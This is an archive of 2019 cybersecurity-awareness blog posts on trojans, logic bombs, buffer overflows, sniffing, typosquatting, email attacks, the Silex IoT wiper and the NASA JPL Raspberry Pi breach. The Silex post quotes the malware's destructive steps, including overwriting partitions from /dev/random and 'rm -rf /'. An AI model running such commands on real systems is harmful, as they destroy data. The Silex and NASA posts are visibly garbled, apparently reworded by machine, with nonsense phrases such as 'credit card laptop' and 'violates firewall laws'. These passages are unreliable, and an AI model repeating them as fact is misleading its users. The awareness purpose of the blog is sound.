Let us take an example of a remote access trojan. Let's say that a person wants to clear unwanted files from their computer's hard drive and to do this they search the internet for a utility software that could help them do this. They find a legitimate looking software on a website that they had not visited previously. They download it and install it on their computer, hoping that it would help them solve their issue. Now, the utility does do what they thought it might, but underneath the good looks of a clutter removing software, it also gave full remote access to the attackers who inserted the trojan horse on the website from where the victim downloaded the software. In this way, the person who downloaded the software became the victim of a remote access trojan attack, and they have zero idea about what the attacker is capable of doing with their computer.

Read More

5

July, 2019

The entertainment and media industry being targeted? Seriously?

Who all like to watch their favourite TV shows and movies without any disruptions? Who all hate it when there is a movie you are so eagerly waiting to see at the cinema, but one of your friends comes in and gives you spoilers ...
about the movie just because they had already watched the film before its actual release? Spoils the fun, doesn't it? Well, these are few of the things that concern people who work hard to bring entertainment or the news to you. This blog talks about how cyber threats affect the entertainment and media industry, and what impact could those threats have on this industry.

People like it when they get a sneak peek of something, but if a whole movie gets leaked, that is something not to be happy about as if people are happy with all the leaks, then it gives hackers the motivation to keep pursuing their malicious activities. Imagine the amount of damage it causes to the people who are a part of the movie that got leaked. All their hard work goes into digital dirt when something like this happens. This is because if the film does not make that much money, then they won't get paid enough, and the people behind the creation of the movie would not get enough money to cover for all the expenses that were incurred in making the movie in the first place.

Many hackers are paid by organisations to steal information from their competitors. The stolen data could be regarding any distributions, the technology used for production, or it could be the company's intellectual property. Insider threat is also one of the biggest concerns for entertainment companies as a lot of people tend to have access to the produced films during the post-production phase. Some attackers do not want to steal any information, but instead, cause destruction and chaos. They use techniques to hack into an entertainment company’s network, for example, the network of the studio where the film is under post-production, and destroy all the media that is contained in the computer systems or the whole computer systems themselves.

Entertainment and media industry being the targets is exceptionally alarming as not many companies have yet started implementing cyber security mechanisms. The targets are very high profile in this industry, which tends to lure attackers towards them, and hence, there is a great need for the companies operating in this industry to secure their assets from cybercrime.

Read More

4

July, 2019

Cyber security in supply chains

When people think of cyber security, they think that it is something concerned with safeguarding computer systems and the information they hold. Well, for those who think this is what cyber security is about, they are correct. ...
For those who did not know what it was or is, you can first try reading and understanding the first line of this blog again. The concept of cyber security has been known and implemented for a long time now. However, there are a lot of ways in which it can be used but has not gained that much popularity related to those uses. This blog talks about the benefits of cyber security in supply chains and also discusses some of the threats that can be mitigated by implementing cyber security in the world of supply chains.

Supply chain is the transfer of services or products from one entity to another. The passage of the service or the product is usually from the supplier of raw materials to intermediate or component manufacturers, which then goes onto assemblers or the manufacturers of the final product. From these assemblers and manufacturers, the service or product gets supplied to distributors and wholesalers who then provide it to retailers. The retailers finally deliver the service or product to the customers. In between all the supplying, there are a lot of storage and transportation activities involved, and all these supply chain activities are connected to each other by the help of planning, information and unification. Let us take an example of a tangible product, say a smartphone. The components that make up the smartphone are manufactured by several different vendors, who send these components to a single place where these components are put together to build the smartphone in question. The smartphone is then sent to distributors, who then provide it to the retailers, and then the retailers finally sell the smartphone to the customers. During the processes of manufacturing components, assembling the smartphone, bringing it to retail stores, and selling it to the customers, there are several touch points through which the "product"passes. The product even gets into the hands of the people who transport it from one place to another. Now, imagine if, at one or more of these touch points, someone decides to do something malicious to the product. What if someone decides to sabotage the product? Attackers could go to extreme extents and use various methods to attack their victims and cause severe damage to them. For example, threat actors could impersonate someone at the plant where smartphones are assembled, and they could use that opportunity to insert an extra computer chip onto the motherboard of all or some of the smartphones, or they could fully replace a particular component, which would, later on, be of advantage to the attackers. Now, the attackers could also have been paid by a rival company to perform these sabotage activities so that the victim company would not be able to complete its operations successfully.

There have been cases where computer hardware was delivered with malicious software already installed on it, cases where vulnerabilities were discovered in the software applications used within the supply chain, and source code manipulation. All this calls for cyber security in the supply chain as it deals with the protection of IT systems, networks and software that can be affected by various types of cyber threats, such as malware, information theft, and so on. Organisations should incorporate cyber security mechanisms in their supply chains. To lower down the security risks, organisations could try to buy from only those vendors that are fully trusted, and they could also try protecting all their critical systems by isolating them from external networks.

Cyber security in supply chains should be taken seriously if organisations want to keep cyber threats away from affecting them and their customers. Various standards have been created by many authorities for organisations to use and put appropriate countermeasures in place.

Read More

3

July, 2019

Logic bombs

Bob: It is 6 AM. I should get up.

Alice: It is 6 PM. I should head to the gym. I have a group class that I have to attend to

...
Human beings use time to remember what task they should be doing next. They do things depending on one condition or the other. Well, we all know that in this century, even inanimate things can do the same. Hah! Touche! We are not talking about robots here. This blog talks about a specific type of malware called logic bomb and what impact it can have on its target victims.

The word malware is made up of two words, malicious and software. From this, we can infer that malware is malicious software that is coded by hackers to perform malicious activities on the computer system that it infects. Adversaries can program malicious software according to what they want it to do, and then use several different techniques to spread the malicious software into multiple computer networks and onto target computer systems. A logic bomb is a special type of malicious software that most of the people are unaware of. It is a malware that is programmed by threat actors to infect target computer systems and then start performing some malicious function when a very specific condition is met. The particular condition on which the logic bomb’s execution depends is called the trigger of the logic bomb. Many people also like to refer to a logic bomb as slag code. Attackers use logic bombs in several different situations, such as when they want to destroy their target systems on a particular date, at a specific time, or when some other type of event occurs on the target computer system. An example of a logic bomb attack is the one that wiped the Master Boot Records and hard drives of two media organisations and three banks simultaneously. This attack took place in an Asian country, and sadly, about 30,000 computers systems were compromised by the attackers. The logic bomb started wiping when the clock struck 2:01 PM on the day of the attack.

Logic bombs usually sit there on the target systems silently until they are executed, and when they are, it is mayday for the victims. Logic bombs can be created for any computer operating system. Even mobile phone operating systems have not been left alone by cybercriminals. Mobile phones are used widely around the world, and if the operating systems on those devices are not immune to a logic bomb like malicious software, then one can only imagine the amount of damage that can be caused by threat actors to the victims who fall prey to such an attack. It is not just individuals that are affected, but organisations also face a lot of dangers from infected smartphones or other types of mobile devices.

Nowadays, there are a lot of organisations that follow a BYOD or Bring Your Own Device policy, which allows the employees of the organisation to bring and use their personal devices inside the premises of the organisation. People use those devices for both private as well as work purposes. If these devices are infected with a logic bomb, and the attackers program the malware to spread from the employees’ device onto the organisation’s network and then infect all other computer systems present in the network, then the organisation could face a lot of trouble. For example, let us say the logic bomb somehow manages to infect all the computer systems in the accounts department. The attackers could then make the logic bomb detonate on a very special day, such as when a lot of financial transactions are to be made, and damage the systems. This could cause a lot of losses to occur because, for example, the systems may not be able to record the transactions, and the money may get lost due to improper working of the systems.

Logic bombs have caused several disasters in the past and can be very scary. It is used a lot by state-sponsored hackers and Advanced Persistent Threats. People should be aware of this kind of malware so that they can put the appropriate security measures in place to protect against a logic bomb attack.

Read More

2

July, 2019

Buffer overflow attacks

Vulnerabilities can be present in anything, and hackers can take advantage of those vulnerabilities using several different methods to cause damage to their victims and for their personal benefits. Even human beings have vulnerabilities that can be exploited by cybercriminals in order to perform a social engineering attack on them and elicit sensitive information, ...
which the attackers can then use for other malicious purposes. This blog talks about a particular vulnerability called buffer overflow vulnerability that could be present in any information asset that is built using computer code, and how attackers use this vulnerability to attack their victims. The blog also discusses the impact that can be caused by an attacker using this kind of cyber attack.

In the world of computers, a buffer is a physical memory location that is used to store data temporarily while it is being transferred from one location to the other. They are usually used whenever there is a difference between the read and write rates of data. A buffer overflow occurs when the data that is being written into a buffer has a size that is bigger than the size of the buffer itself. The data overflows outside the boundaries of the buffer, and this can cause the overflowing data to be written into memory locations that lie beyond the last memory address of the buffer being overflown. The memory locations that would be written into may already have some data in them that would get overwritten, or the overflowing data may cause some arbitrary computer code to get executed.

Cybercriminals take advantage of this vulnerability by entering larger data than they think a buffer would be able to handle and then causing the system to execute arbitrary malicious code, which causes the system to perform unnecessary behaviour. Many times, the malicious code simply makes the system crash, which leads to a Denial-of-Service. A lot of software applications out there are vulnerable to buffer overflow attacks. Even web applications that are used by millions of users worldwide have this vulnerability. Developers do not take proper care while writing the source code, which eventually leads to such type of weaknesses in the systems and software. Many of the major operating systems themselves have buffer overflow vulnerabilities, which become the reasons for colossal security breaches. Threat actors use various techniques to send well-created data into web applications and make the application execute their malicious computer code. A buffer overflow attack is so powerful that it can allow hackers to take total control over the web server that is hosting the vulnerable web application. It can enable the attackers to gain control over a process' execution or crash the process altogether. Another purpose served by this kind of attack is that it allows the adversaries to make alterations to internal variables. There are two main types of buffer overflow attacks, namely, heap-based buffer overflow and stack-based buffer overflow. The idea behind both types of attacks is similar, but in a heap-based buffer overflow attack, the buffer is allocated on a heap, whereas, in a stack-based buffer overflow the buffer is allocated on a stack.

The libraries used by many web applications also tend to put the web application under the risk of a buffer overflow attack. There have been a lot of cases in the past when the cause of the cyber attack was a buffer overflow vulnerability, and every day there is news regarding a new buffer overflow vulnerability being discovered in some or the other product. An example of a buffer overflow flaw is the Devil's Ivy vulnerability that affected millions of Internet-of-Things (IoT) devices in 2017. It can be exploited remotely by cybercriminals by sending a large XML file to the vulnerable system.

Similarly, there are vast numbers of buffer overflow vulnerabilities out there, which can be easily exploited by adversaries to cause damage to their targets. Measures should be put in place to prevent the occurrences of such flaws in systems, and to protect victims from falling prey to cybercriminals.

Read More

1

July, 2019

SILEX Malware

14-year-old creates dangerous malware, starts bricking thousands of IoT devices:

In a couple of hours over 2,000 units were bricked. Attacks remain in progress.A fresh Silex software is going to make thousands of IoT products brick. A 14-year-old teenager, known by the pseudonym Light Leafon, has created this malware. ...
The malware strain is influenced by the infamous malware killed by millions of IoT machines, BrickerBot, back in 2017.Malware has succeeded in bricking up to 2000 devices in one hour. Silex malware uses the default IoT credentials, disrupts storage and violates firewall laws and wipes network setup.The malware lists all mounted drives when accessing and writes them to /dev/random, then deletes the laws of the systems, removes their Network config and restarted them to any Unix system with default credentials. Silex lists all mounted drives and lets you restart them.It bricks the device efficiently and makes it useless until someone performs the complicated dance required to download and reinstall the firmware of the device. Since it appeared previously today, the worm has taken down at least 2,000 equipment and is indiscriminate enough to be able to pull out malconfigured GNU / Linux servers.At least some of the worms from novinvps.com, located in Iran, have been served. NewSky Security Ankit Anubhav tells ZDNet that he has made contact with Light Leafon, the author of the worm, which claims 14 years of age.Light Leafon said he started to use malware as a joke and has now turned it into a full-time undertaking. At the time he met Ankit Anubhav, a Newsky Security analyst. As Leafon has said, he will continue to develop the malware, making it increasingly dangerous, with the first BrickerBot utility.His agreements include the usefulness of allowing the malware to log into SSH devices and to add abuse to the malware to get into IoT devices by abusing its vulnerabilities.Especially surprising is the use of understanding and ability of a 14-year-old teenager to block equipment. However, scientists say that a few OpSec botches have been presented, which specialists can capture him.

HOW THE SILEX MALWARE WORKS:

Silex works by disrupting the IoT device's storage, dropping the firewall rules, removing the network configuration, and then stopping the device according to Akamai researcher Larry Cashdollar, who first found the malware today. It is as damaging as it can get without frying the circuits of the IoT device. The victims must reinstall the firmware of the device manually, a task too complex for most device owners. Some owners are most probable to throw away equipment, thinking they had a hardware failure without understanding that the malware hit them.Cashdollar told ZDNet today in an email that it uses recognized standard IoT-device credentials to log in and destroy the system. This is done by writing random data to any assembled storage that it discovers from /dev/random. I see that fdisk -l is called in the binary which lists all disk partitions, added Cashdollar. It then writes random information in all partitions it finds from /dev/random It deletes network settings and [ ... ] it also deletes rm-rf / anything it misses [ running ]

Attacks Carried Out From An Iranian Server:

The system I have captured is aimed at every Unix-like system with default login credentials," Cashdollar said. I also found that there was a downloadable Bash shell version that aims at any Unix-like architecture like OS. This also implies that if they are opened and secured with bad or widely used credentials, Silex will trash Linux servers.Cashdollar said when we were looking into the source of these assaults that IP address aimed my honeypot is hosting on a VPS server owned by novinvps.com operated from Iran.

Once IoT malware researcher Rohit Bansal has stated, the IP address was already added to the URL has blacklist.

Read More

29

June, 2019

Importance of security in the education industry

In a world where cybercriminals are leaving no opportunities to attack their targets and making sure that they get a piece of every single industry out there in the world, there is one particular industry regarding which many ...
people think that even if hackers manage to steal data, what would they do with it. The industry being talked about is the education industry, and for those gentlemen and gentleladies who do not know, there is more to educational records than just grades and points. Educational records also contain personally identifiable information in them, which if stolen, could lead to a lot of issues for the victims. This blog talks about what educational records entail and how important is it for authorities to secure these records from adversaries. But, before we start off, let us first see what personally identifiable information really is and why is it so necessary to secure it from threat actors.

Personally identifiable information or PII is the information about a person using which another person or an organisation can clearly identify the person to whom the data belongs to. Examples of personally identifiable information are name, birthdate, ID numbers, etc. Attackers can steal this information and use it for malicious purposes, such as identity theft, social engineering attacks, or they could also sell this information on the dark web to the highest bidder, who would then use it for their own advantages.

Educational records also contain personally identifiable information, and if these records are stolen, then so will be the PIIs along with the records. Educational records are recorded and stored by educational institutions, such as universities, colleges, schools, etc. for keeping track of the students who are or previously were enrolled with the institution. They use the records for institutional purposes, and sometimes for providing statistics to other organisations. Another reason for educational institutions to maintain records is that many of their students ask the institutions for a record of their academic profile so that they can send it over to other institutions, such as a higher education institute. Students send their mark sheets, obtaining which would be impossible if institutions did not maintain educational records. However, storing and maintaining hundreds of thousands of educational records can be a hassle for institutions, and as the information is digitised these days, it becomes vulnerable to being disclosed, altered, or destroyed by cybercriminals. The systems that store these records are not necessarily well-protected by institutions thinking that why would someone attack an educational institution. This thinking has caused significant security breaches in the past, which should make institutions roll up their sleeves and get to implementing robust security controls to safeguard their information systems. One security breach involved the theft of personal data of 15,000 students, which was later posted onto a forum website by attackers.

Let us consider another example. Imagine if cybercriminals use malware, such as ransomware, to attack the information systems of educational institutions. The ransomware could infect the systems and then encrypt each and every piece of information on those systems, which may or may not be recoverable after the attack. This would have a massive impact on the victims. The institution would not be able to see their student records, and would not get to know about the performance of any of its students, and the students themselves would also not get to know about their academic performance. This could create chaos at the institution. Now, if one such attack on one institution can cause so much trouble, then we can only imagine if a vast number of institutions are attacked.

Many countries have laws in place that protect educational records from unauthorised disclosure, alteration or destruction. One such law is the Family Educational Rights and Privacy Act of 1974. It controls the access of educational records to entities other than the institution that stores and maintains them. There should be more focus on the security of information systems that hold educational information and how this kind of information is handled by various entities.

Read More

28

June, 2019

Indian Smartphone Choices

Smartphones has become an essential element in the today's world and India is the world's fastest growing smartphone market and will not slow down anytime soon. ...
The trend of cheap mobile data and unlimited voice calling has made the people so addicted to smartphones that life without them is hard to imagine.

To gain more insights from the industry, 91mobiles conducted a survey from a sample space of over 15,000 users that revealed some key facts and statistics. Smartphone Buyer Insights Survey 2019 asked Indian users from all walks of life how often they change their phones, preferred price range, and preferred buying platforms.In today's Indian market bigger brands like Samsung and iPhone have to compete with the newer brands which offer killer specs at an competitive price range.

3 out of every 5 smartphone users, mostly working men, have an upgrade cycle of less than 12 months, with 80% likely to buy a new phone in 2019. With smartphone changes, women are slightly less frequent with a 4:3 male - female breakdown. Unsurprisingly, younger users upgraded their phones more frequently than those over 35.In terms of pricing, most sales were seen in the 10-20k INR segment, which is also the segment where we've seen the most competitive devices from brands like Redmi, Realme and others. Women have been found to prefer cheaper phones, while men have been seen opting for more expensive devices. Users under the age of 35 were more likely to prefer phones in the budget segment below 20k.

Talking about the actual purchase process, some 80 percent of users prefer to research their next smartphone online, regardless of whether they are going ahead with the transaction. Tech sites were the most preferred source of information, followed by e-commerce sites, but a huge margin. Women are more likely to buy online phones than offline. While sales in the online segment are increasing, given the option of either buying the device online or offline, if the offline price is 1,000 more than online, 3 out of 5 users will prefer the cheaper online option.

As for phone preferences, most users would prefer an all-rounder, with performance and camera taking top spots. Interestingly, most men would want their phone to be more powerful while women prioritized camera and battery performance.Specific cameras data reveal how Indians perceive camera performance based on specifications. Men would prefer a camera with a larger aperture, while women would focus on front cameras. Younger users were more concerned about the number of cameras, while those above 35 wanted higher resolution sensors.As expected, most users would decide based on processor brand and RAM, while 11 percent of men also looked at benchmarks. For women, that figure fell to 6 percent.

Some of these facts are interesting and just go to show how dynamic the Indian market is. 91mobiles also expects these insights to help smartphone OEMs better tailor their Indian market offerings.

Read More

27

June, 2019

Views of people regarding security

It has been a while since we looked into what is currently going on in the world of security, and what our friends around the world are thinking regarding the cyber threats that are currently causing havoc everywhere. ...
This blog talks about what people or organisations believe are the biggest problems for them.

People do all sorts of stuff on the internet without thinking about the risk that they may be putting themselves in when they click on links to websites they have not heard of before, download games and other software from unknown websites just because the site is giving it for free, store their sensitive files in a cloud about whose provider they know nothing and so on. All these unsuspecting acts can lead to people's computer systems getting compromised by hackers and their sensitive information being stolen. Different people can become victims of different types of cyber attacks, and the impact on one victim would also be very different from the one on another. Companies all over the globe perform research on what people feel is the most prominent and worst threat to them. They take into account all types of threats, such as terrorism, burglaries, physical violence, internet fraud, and all other kinds of threats you could think of.

It seems from the latest reports regarding particularly cyber threats that cybercriminals are indeed getting smarter, more intelligent, and are using even more lethal methods to orchestrate cyber attacks. They are using sophisticated attacks like never before to cause significant damage to each and every one of their victims. This has made concerns over security matters to increase multiple folds worldwide. It has been over a decade since the level of concern was at this high a level. A majority of the people around the world are mostly worried that attackers may infect their computer systems with some or the other type of malicious software, or they may use their skills and various techniques to hack into their systems. Threat from malware has been prevalent just like previous times.

Further, there are a lot of people who think that they are in danger whenever they try to shop for things online, and they are even concerned about their safety when using their bank's online website for performing internet banking activities. Another type of cyber attack that has been bothering a large group of people and which has surpassed the perceived threat level of things like terrorism, riots, global war, etc. is identity theft. Identity theft is a cybercrime in which threat actors steal their victim's personal information or other things with which the victim could be identified, and then use that information to impersonate the victim. There is one more cyber threat that has been seen to be causing pain to the victims, and that is credit card fraud. It has become so common that it can easily be said that there are more number of victims who fall prey to credit card fraud in a year than there are hair on a human being's head. There are various ways that credit card fraud takes place. It can either be that an attacker somehow steals the actual credit card from the victim and then use it to perform transactions, or it could also be that they use other types of information-stealing attacks to steal just the information related to a victim's credit card, such as the card number, security code, etc., and use that information to perform transactions.

Whatever the case may be, cyber attacks are getting very widespread, and people need to be made aware of the threats that they may be facing whether knowingly or unknowingly. People and organisations need to step up their security game if they want to outsmart cyber criminals and save themselves from being attacked, or at least protect themselves from facing massive losses even if some adversary manages to attack them.

Read More

26

June, 2019

Email hacking

Emailing technology has been around for a while now, and it has helped individuals as well as organisations in sending and receiving important information across the internet to others who may or may not be present in the same corner of the world as the person sending the email. ...
Emails travel across the globe and pass through various types of systems, such as routers and email servers. It would be wise to think that emails may face several kinds of dangers along their way to the recipient and onto their computer system. This blog discusses how hackers could use various types of cyber attacks to steal the information contained within email messages and how they could use emails as a means to cause damage to their victims.

Attackers compromise emailing systems around the world to steal the sensitive information present in the emails sent and received by their victims. After stealing sensitive data, the threat actors use that data for other malicious purposes. They could either themselves use the data directly, or they could sell that data on the dark web to someone who may be interested in having their hands on that information. One of the ways in which cybercriminals could steal information from email messages is by using a sniffing attack. In a sniffing attack, a threat actor first tries to connect their hacking system to a wireless access point, or they may find an ethernet cord lying around and attach their system to the local network using that. After having being connected their computer to the local network, the attacker could use either software sniffing tools or hardware sniffers to listen for information flowing on the network to and from a target device. They can then capture the information onto their systems, and later try to find data related to email messages, and from among all the sorted out email data, they could pick out the relevant information, which they could use to perform another cyber attack on their victims. For example, when a user is trying to send some secret information via an email, and if it happens to be that the email service provider does not use encryption to secure their users’ emails, then cybercriminals would easily be able to capture and read the sniffed email messages. The secret information would be easy to read as it would be available to the attackers in cleartext.

Another example would be when threat actors manage to sniff off the user credentials of a victim's email account while the victim is trying to login into their accounts. Attackers could use the stolen credentials to login into the victim's email account themselves and then steal all relevant information from there. Emails can also be used to spread malware onto victims' computer systems. This type of attack takes advantage of a little bit of social engineering as well to lure victims and get them to download the email attachments. Several people also make the mistake of blindly opening the email attachments without even investigating what it might contain, and then get their systems infected with dangerous malware. There is another type of attack that attackers use to fool victims and is called an email spoofing attack. In this cyber attack, adversaries alter the name or email address of the sender and the body of the message to make the fake email look like it was sent by an authentic entity, such as the IT department of the company for which one is working, or the bank with which a person has an account with. Attackers could then pair this attack with a download click bait attack by inserting a malicious link into the email and making it seem as if it is legitimate. Let us take an example of such an attack. Let's say the attacker spoofs an email and makes it look like it was sent by the victim’s bank. The email contains instructions that tell the victim to change a specific setting in their account and that they could do this by navigating to the link given in the email, seeing which the victim does not get alarmed as the email looks very legitimate. The victim clicks on the link and is taken to a malicious website created by the attacker, which looks exactly like the bank's website. The victim enters their online account credentials and tries to log in. They fail on the first attempt as the site was just a fake one, but then are redirected to the bank's original website. They try to log in there, and they succeed. What they do not get to know is that when they first submitted their user credentials, the attackers had stolen them using the bogus website. The attackers can now use those credentials to login into the victim's online bank account and steal money from the victim.

Emails are a great attack vector for any cybercriminal, and if they are smart enough to use this attack vector, then a great amount of damage can be caused by them. Hence, it is necessary to protect emails and emailing systems from getting compromised and to be vigilant enough to spot those emails coming from adversaries who want to attack victims.

Read More

25

June, 2019

Typosquatting

Alice: Hey! Bob! Could you come over here and help me with something?
Bob: Sure! (Bob comes over to Alice) What is it, Alice? What do you need my help with?
...
Alice: I have an important class right now, but there is one thing that I really need to buy right now as only one is available on the website, and only they sell the best quality stuff. If I give you my laptop, then could you go online and buy that thing for me? Please!
Bob: Umm. Ok. I guess I could help you with that. Give me your laptop.
Alice: Oh! You are so sweet, Bob! Here is my laptop. The website is xyz.com, and I need to buy a stethoscope from there. It will be the only stethoscope on the site, so you would not have trouble finding it. Just order it and choose the payment option to be cash on delivery. You already have my address. Ship it there. I will take my laptop from you after my class. Thank you!
Bob: You are welcome, Alice!

Bob boots up Alice’s laptop and opens up a web browser. But, when trying to navigate to the xyz.com website, he makes a mistake while typing in the URL and types in xyx.com instead of typing xyz.com. The web browser loads up the xyx.com website, but Bob does not notice what had happened. The reason because of which Bob did not notice anything is because the xyx.com website looked exactly like the xyz.com website and Bob did not have a look at the URL on the top of the web page after the page had finished loading. Bob used the site to order what Alice had asked him to, but he had to make the payment using his own credit card as he found that the cash on delivery option was not available on the website. When Alice did not receive the product on the expected date, she asked Bob whether he had ordered it correctly. They both sit together and try to figure out what had happened. Being investigating for quite some time, they finally found out the reason behind the stethoscope not getting delivered. They were totally shocked to see that the website that Bob used to order was really a malicious website created by some cyber-criminals. They had taken advantage of the misspelt URL to lure Bob into navigating to the bogus site and order the product, and through this, they had stolen Bob’s hard earned money. This type of attack in which hackers take advantage of a minor mistake of a victim mistyping a URL into a web browser to get them to visit a fake website created by them, and then use that to cause severe damage is called typosquatting.

Threat actors use their clever minds in figuring out how people can make mistakes while typing a URL, and then they intelligently get a domain name registered that is very much similar to another one that already exists and to which they think a lot of people visit. Adversaries not only take advantage of the domain name for luring victims, but many times they also leverage the fact that a lot of people even mistype the top-level domain name. An example of this is someone typing ‘.og’ instead of ‘.org’ as can be the case when a person is typing too fast or is not paying a lot of attention to what they are typing, and then hitting the enter key after typing in whatever URL. Attackers can prey on a large number of victims using this attack as humans make a lot of mistakes while typing on a computer, and as a result, a lot of damage can be caused by cyber--criminals through this attack.

This particular cybercrime is considered to be so dangerous that some countries even have special laws in place to protect people from this cybercrime. People need to protect themselves too by staying vigilant all the time.

Read More

24

June, 2019

Stop them from sniffing

Attackers use sniffing attacks to steal all sorts of information that they use immediately or in the future when performing a more sophisticated and highly targeted cyber attack on their victim. This blog talks ...
the impact of a sniffing attack and how this kind of cyber attack can be prevented from causing damage to the victims.

Let us consider an example to understand the severity of a sniffing attack. The day is Friday. Bob gets off from the office and goes straight to his favourite restaurant and orders his favourite dish, the cheeseburger. While waiting to receive his order, Bob takes out his laptop and connects it to the restaurant’s open wireless network. While sitting at the table, he navigates to his favourite streaming website, enters the login credentials to the site, and logs in to it. He is faced with a notification saying that his subscription service needed to be renewed for him to continue watching his favourite TV shows and movies. As Bob really enjoys watching his favourite shows, he pops out his credit card from his wallet and enters all the card details in the payment details. He then clicks on submit, and finally, he has his subscription service up and running again. As soon as Bob starts to watch his television show, he receives his burger, and happily enjoys his time. A day later, he gets an SMS message which said that a transaction had been made at a certain online store to purchase some electronic goods. He was shocked to see the message as he did not make any such purchase himself. Well, turns out that Bob’s credit card information was stolen at the restaurant he visited on Friday. A hacker had used a sniffing attack to steal Bob’s credit card information when he was using it to renew his video streaming subscription service at the restaurant. This is not a rare occurrence at public places which have open wireless networks for people to use while they are at that place.

As seen in the example, threat actors use a sniffing attack to steal sensitive information, such as payment card details, user credentials for online accounts, bank account information, and so on. Countermeasures should be implemented by individuals as well as organisations to prevent a sniffing attack and protect sensitive data from getting stolen. One recommendation is that one should try to only use a wireless network if the wireless access point is secured with a strong password, such as when sitting at a restaurant and they offer free WiFi and provide you with the password to connect to the wireless network. This is to make sure that people who are outside the premises cannot connect to the wireless access point, which makes it a little more secure than an open wireless network to which everyone can connect without the use of a password or a PIN. An unsecured wireless network is very susceptible to sniffing attacks as you may have noticed by now. Someone could be connected to the open network and be sniffing all the network traffic flowing through the access point, and stealing information. Well, someone connected to a secure WiFi could also be sniffing, but the chances are less as compared to ones with an open wireless network.

When you are out and about at a public place, it is better to use your own personal hotspot because there are fewer chances of it being compromised or attackers being connected to it, and due to this, there would be hardly a chance of someone sniffing the network. Another good practice would be that if the work that you want to do online can be done using only your smartphone, then use your smartphone and access the internet using the cellular network of your phone as this would reduce the risk of an attacker sniffing on the network even further.

If there is unavailability of other options and one definitely has to use a public wireless network, then it should be made sure that secure communication channels are used. For example, when accessing online resources, Virtual Private Networks could be used, which would encrypt all the traffic flowing between your device and the destination, and it would make it very hard for the cybercriminal to recognise what is going on in the network.

Organisations should use proper access control mechanisms to prevent unknown devices from connecting to a particular wireless access point. MAC address filtering can help with this effort as it would only allow those devices to connect to the access point whose MAC address is present in the access control list.

These were some of the ways that can help protect against sniffing attacks and reduce the risk of further damage. Sniffing attacks are very sneaky, and thus, care should be taken to prevent the sensitive information flowing across networks from getting stolen by adversaries.

Read More

24

June, 2019

Hackers Used Raspberry Pi To Breach NASA

Raspberry Pi is a tiny tool that can be used to get disappointingly elevated performance, as the latest study verified that a NASA laboratory has been hacked with a Raspberry Pi This has been shown. ...
Cyber In this week's report, the U.S. Office of the Inspector General said someone had linked to the network an unauthorized Raspberry Pi, a basic computer that costs $25-$35 for yourself. A cyber snooper was then able to springboard a credit card laptop into two of the primary networking systems of the Jet Propulsion Laboratory and steal up to 500 megabytes of 23 records of information

The International Traffic in Arms Regulations, which involves the Curiosity rover, contained two of these documents, concerning the Mars Science Laboratory Mission. In addition to further useful data, the rover collected soil and rock specimens from the Red Planet.

Although NASA's hack is of considerable interest, it at least triggered an audit and found out how poor the general safety of the scheme is within the space agency. Due to its sharing rather than a segmented setting, Hackers were able to move freely between the distinct devices within the network.This resulted in a concern that hackers might gain access to and initiate ' malicious signals for space flight missions. 'JPL was not commenting on JPL located outside Pasadena, Calif. Who linked Raspberry Pi to the JPL or who was behind the cyber assault is uncertain.

After being told about the hacking, the Johnson Space Center Houston disconnected its system from the exploited portal of the JPL, because of the worry that the hacker may move into its mission applications. NASA also said that the hacking opened the door for the possible handling of the Deep Space Network, a global radio antenna system that gathers information on interplanetary space missions and commands them, as well as some which orbit Earth. The Johnson Space Center came to an end as a precautionary measure.

In its report, OIG explains:

In addition, when adding equipment to the network, the system administrators did not update the inventory system continuously. In particular, we discovered, that 8 out of 11 system administrators who manage 13 installations within our sample have a distinct inventory table, from which they manually update the data in the ITSDB Inventory.A system administrator informed us not to insert fresh equipment frequently into the ITSDB when necessary because sometimes the data database update feature does not work and later forgets to provide the data about the asset. Accordingly, assets can be integrated into the network without the safety officers identifying them correctly and examining them.

The cyber-attack in April 2018 exploited that specific weakness by targeting a Raspberry Pi laptop which was not allowed into the JPL network when the hacker accessed the JPL network. Without the JPL [ Chief Information Officer Office] review and approve, the device should not have been allowed on the JPL network.

Raspberry Pis are popular because they give a disappointing platform that is ideal for tinkering in a hot-bitted form. JPL has found out how it can undermine systems that send robots into space even an inexpensive machine with a cute name.

Read More

22

June, 2019

Sniffing attacks causing sneezes

Hackers use different techniques to attack their victims, but their motive is usually the same. They either want to steal money or some kind of sensitive information. For each of their purposes, they come up with various types of attacks, which help them achieve their tasks. ...
Cyber attacks are usually used to steal user or company information or are used as an initial phase for a further, more sophisticated type of cyber attack. This blog talks about a specific type of cyber attack called sniffing and how it can be used to steal sensitive information by threat actors, and also the ways it can be used as the initial step for a more massive cyber attack on a target victim.

Sniffing is a type of cyber attack in which adversaries use different kinds of tactics, techniques, and tools to listen in on network traffic and steal the required information from the flowing network traffic. In other words, the attackers can connect their attacking devices to a target network, and use sniffing tools to intercept the local area network traffic flowing on the network. One of the ways cybercriminals usually start performing this attack is by first compromising a wireless access point to which the client device of their target is connected, or if the network is a wired one then they could use cable taps to tap into the network cable and connect to the network, but that is usually not an easy task for the attackers. Victims who have not adequately secured their wireless access points with strong passwords or those who do not follow network security best practices are the ones who are considered to be the most vulnerable to this type of attack and often become the targets of cybercriminals. Another great watering hole which threat actors can take advantage of is an open wireless network present at a public place, such as a restaurant or an airport. The open wireless networks present at public places are considered as an attraction by people visiting those places. Even children nowadays cannot live without the internet.

Child: Hey! Mom. Is there Wi-Fi at that restaurant?
Mom: Yes!
Child: Ok! Let's go there then.
Little do people know about the dangers of using an open public network. Threat actors usually blend in with the crowd, and while connected to the open wireless access points, they keep on sniffing all the network traffic flowing through that particular access point. By using multiple sniffing tools and capturing network packets, they manage to gather a lot of information regarding the targets. The attackers then analyse all the captured data and find relevant information that they could use for their other malicious purposes. The information that they seek for is mostly victims' usernames, passwords, text messages, emails, SMB data, etc. If they discover someone's login credentials, then they first try to figure out, for example, to which website those credentials belong to and then use those credentials to login into the victim's online account and perform malicious activities.

